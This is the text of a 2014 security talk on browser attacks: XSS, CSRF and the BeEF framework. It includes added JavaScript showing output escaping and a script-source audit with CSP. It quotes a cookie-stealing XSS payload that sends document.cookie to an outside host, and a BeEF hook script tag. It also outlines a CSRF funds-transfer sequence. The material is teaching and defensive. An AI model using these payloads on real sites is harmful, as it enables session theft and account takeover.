Posted: 12-Nov-2014 | Category: Technology | Uploaded by: awiasecretary
It's 10pm, do you know where your browser is?
Christian @xntrik Frichot
Hi - I'm Christian ..

SCARY
Cute ;)
Enhancing Lives

Why are we here?
I <3 U
And we lurve the Internet
>=] <3 U
But so do bad-guys

Online Banking
Online Bank Robbery
Way easier these days..

Online Communication
Online Romance
Online Heart Robbery
Way easier.

Sad?
Sadder!

Browsers & Web Apps
But this is what we're talking about..
Browsers
Web Apps
OVERVIEW
1. The Ubiquitous Web & its Imperfect Trust Model
2. Malicious Actors Do Malicious Things
3. You already deploy defences (even if you don't know it). Let's bolster them.

Ubiquitous
The Internet is pervasive and ubiquitous
People who 'support' the ecosystem are multiplying
Lots of people
Lots of browsers
Lots of attack surface

!eCommerce
Commerce!
Why?
Attackers don't care; they just see victims.

But it's broken
What does this mean?

So how is my mum meant to know that this doesn't mean the same thing??
http://www.usablesecurity.org/papers/jackson.pdf
Yup .. a fake frame inside someone else's site..
Domains are mixed

Traditional security models just don't work in this new age.
Bell-LaPadula?

Same Origin Policy
Closest we have?

In the end though ..
The browser will do what the server says. The server will do what the browser says.
It's Mighty (confusing)
The browser is mighty - and it's used by all of us ...
and it's confusing..

So just how bad is the bad stuff the bad people do?
OWASP, the Open Web Application Security Project, tries to categorise the top 10 riskiest web application security weaknesses. Known as the OWASP Top 10, it's a great resource..
www.owasp.org

Cross Site Scripting (XSS)

In the OWASP Top 10 (the 2010 list) this comes in at number 2, and they describe it as so: "XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content"

Server code:
1. Take the 'greeting' parameter
   page.php?greeting=<input>
2. Dynamically print that out in the response
   <p><?php echo $_GET['greeting'] ?></p>

What if greeting was:
<script>img=new Image();img.src='http://frichot.com/nom.php?cookie='+document.cookie;</script>

Words < Picture < Moving Picture
Demo
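The page.php flaw above, re-done as an added JavaScript example (this is not code from the slides): the same one-line template rendered twice, once the way the PHP echo does it and once with the parameter escaped for the HTML text context it lands in. The payload string is the one quoted in the talk; the hostname in it is the talk's, and the helper names are mine.

```javascript
// Added example, not from the slides: page.php?greeting=<input> modelled
// as two response builders.  renderVulnerable() reproduces
// <p><?php echo $_GET['greeting'] ?></p>; renderEscaped() is the fix.

// The cookie-stealing payload quoted in the talk (hostname is the talk's).
const PAYLOAD =
  "<script>img=new Image();img.src='http://frichot.com/nom.php?cookie='+document.cookie;</script>";

// Escaping for an HTML *text* context: the five characters that can open
// or close markup, attributes or entities.  Attribute, URL and script
// contexts each need their own encoder; this one is only for text nodes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Parameter is concatenated into the markup unchanged, so a <script>
// element in it is parsed as a real script element by the browser.
function renderVulnerable(greeting) {
  return `<p>${greeting}</p>`;
}

// Same template, parameter escaped: the browser now sees the literal text
// "<script>..." inside the paragraph and runs nothing.
function renderEscaped(greeting) {
  return `<p>${escapeHtml(greeting)}</p>`;
}

// Crude reviewer's check over a rendered response: is there a script
// element, inline event handler or javascript: URL the template did not
// put there?  A DOM parser is the right tool for anything adversarial;
// this is enough to show the difference between the two renderers.
function containsActiveContent(html) {
  return /<script\b|\son\w+\s*=|javascript:/i.test(html);
}

// What page.php receives: the query string, with %xx and '+' decoded.
function greetingFromQuery(query) {
  return new URLSearchParams(query).get('greeting') || '';
}

// Render the talk's payload both ways and return the two responses.
function demo() {
  const greeting = greetingFromQuery('greeting=' + encodeURIComponent(PAYLOAD));
  return { vulnerable: renderVulnerable(greeting), escaped: renderEscaped(greeting) };
}

if (typeof require !== 'undefined' && require.main === module) {
  const { vulnerable, escaped } = demo();
  console.log('vulnerable:', vulnerable, '-> active content:', containsActiveContent(vulnerable));
  console.log('escaped:   ', escaped, '-> active content:', containsActiveContent(escaped));
}
```

Two things worth noting. The fix is output encoding for the exact context the data is inserted into; "validating" the input does not help when the same value is later placed in an attribute or a script block that the text-context encoder does not cover. And the payload reads document.cookie, so marking the session cookie HttpOnly keeps it out of reach of injected script; that limits what the script can steal, not whether it runs.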
Cross Site Request Forgery (CSRF)

CSRF comes in at number 5 in the OWASP Top 10.. described as: "Since browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones."

ING Direct
https://www.eecs.berkeley.edu/~daw/teaching/cs261-f11/reading/csrf.pdf (Zeller & Felten, 2008)
Without prior knowledge of secret or random tokens:
If you were online performing banking
And your browser rendered content from elsewhere
They could automatically transact your funds away

GET request to Add New Contact page
POST request to add the contact
POST request to confirm the new contact
POST request to create payment to contact
POST request to confirm payment
Samy Wanted Friends (the 2005 MySpace XSS worm)

This is lovely, but this is manual
This all seems very hands on..

http://beefproject.com
Let me introduce you to BeEF....
The Browser Exploitation Framework ..
The architecture looks a little bit like this.
BeEF is currently made up of 3 main components: Core, Extensions & Modules

CORE
Firstly is the core..
Central API
Filters
Primary client-side JavaScript
Server-side asset handling and web servicing
Ruby extensions
Database models
Hooking methods to load and manage arbitrary extensions and command modules
EXTENSIONS
Web UI
Console
Demo pages
Event handling
Browser initialisation
Metasploit
Proxy/Requester
XSSRays
COMMAND MODULES
Browser
Debugging
Host
Miscellaneous
Network
Persistence
Recon
Router
Hooking Browsers
• XSS
• Social Engineering (e.g. a tiny URL, or phishing via email)
• Embedding the payload (think drive-by-download)
• Maintaining persistence after already being hooked (think Tab BeEF Injection)

<script src="http://beefserver.com/hook.js"></script>
This is pretty much all you need.

Demo
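Since one script tag is all the hook needs, the hook's footprint in a page is one script element whose src points somewhere you did not put it. Below is an added JavaScript example (not BeEF's code and not from the slides) that audits the script sources in a page against the page's own origin and an allow list, and emits the Content-Security-Policy value that would have the browser enforce the same rule; CSP is not something the talk covers. The page markup is constructed for the example, the page origin and CDN host are made up, and the hook tag is the one from the slide.

```javascript
// Added example, not BeEF's code or the slides': flag <script src> elements
// whose origin is neither the page's own nor on an allow list.  The markup
// is constructed; www.example.com and cdn.example.net are placeholders.

const PAGE_ORIGIN = 'http://www.example.com';

// Constructed page: two first-party scripts, one CDN script, the hook tag
// exactly as the slide shows it, and an inline script.
const SAMPLE_PAGE = `
<html><head>
<script src="/js/app.js"></script>
<script src="http://www.example.com/js/vendor.js"></script>
<script src='https://cdn.example.net/jquery.min.js'></script>
</head><body>
<p>Hello</p>
<script src="http://beefserver.com/hook.js"></script>
<script>console.log('inline');</script>
</body></html>`;

// Pull the src attribute out of every script start tag (double-quoted,
// single-quoted or bare).  A regex is enough for a quick audit of your own
// pages; use a DOM parser for anything an attacker may have shaped.
function scriptSources(html) {
  const re = /<script\b[^>]*\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1] || m[2] || m[3]);
  return out;
}

// Resolve relative and protocol-relative ("//host/x.js") URLs against the
// page origin, the way the browser does, and return the script's origin.
function originOf(src, pageOrigin) {
  return new URL(src, pageOrigin).origin;
}

// Every external script whose origin is not the page's own and not on the
// allow list.  A hook.js served from a host you do not recognise shows up
// here no matter how it was injected (stored XSS, proxy, compromised page).
function auditScripts(html, pageOrigin, allowedOrigins = []) {
  const allowed = new Set([pageOrigin, ...allowedOrigins]);
  return scriptSources(html)
    .map((src) => ({ src, origin: originOf(src, pageOrigin) }))
    .filter(({ origin }) => !allowed.has(origin));
}

// The CSP directive that has the browser apply the same rule on every
// load, and additionally refuse the inline script the regex audit ignores.
function cspFor(pageOrigin, allowedOrigins = []) {
  return `script-src 'self' ${allowedOrigins.join(' ')}`.trim();
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditScripts(SAMPLE_PAGE, PAGE_ORIGIN, ['https://cdn.example.net']));
  console.log('Content-Security-Policy:', cspFor(PAGE_ORIGIN, ['https://cdn.example.net']));
}
```

The audit is a point-in-time check of markup you fetched; it says nothing about a script that was added after load, which is exactly what a hooked browser's own JavaScript will do. That is why the CSP value is the part worth shipping: the browser evaluates it for every script the page tries to run, not just the ones in the HTML.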
You can defend yourself
Multiple angles (angels?)

As a minimum ..
Your Baseline, Your Appetite
Determine your appetite and baseline

Update Your Frameworks
Use the latest versions of your framework: Rails, Django, .NET (MVC)

Monitor
http://www.ossec.net/
http://sucuri.net/

Be Prepared
http://tiny.cc/rubygemsresponse

Want Moar?

Dev Lifecycle + Security
http://microsoft.com/sdl

Continuous Security
Brakeman
http://brakemanscanner.org/docs/presentations/
http://www.slideshare.net/xplodersuv/putting-your-robots-to-work-14901538
Mozilla
https://air.mozilla.org/minion-automating-security-for-developers/
http://www.slideshare.net/mimeframe/ruxcon-2012-15195589

You are not alone

Questions?
www.asteriskinfosec.com.au | @asteriskinfosec | @xntrik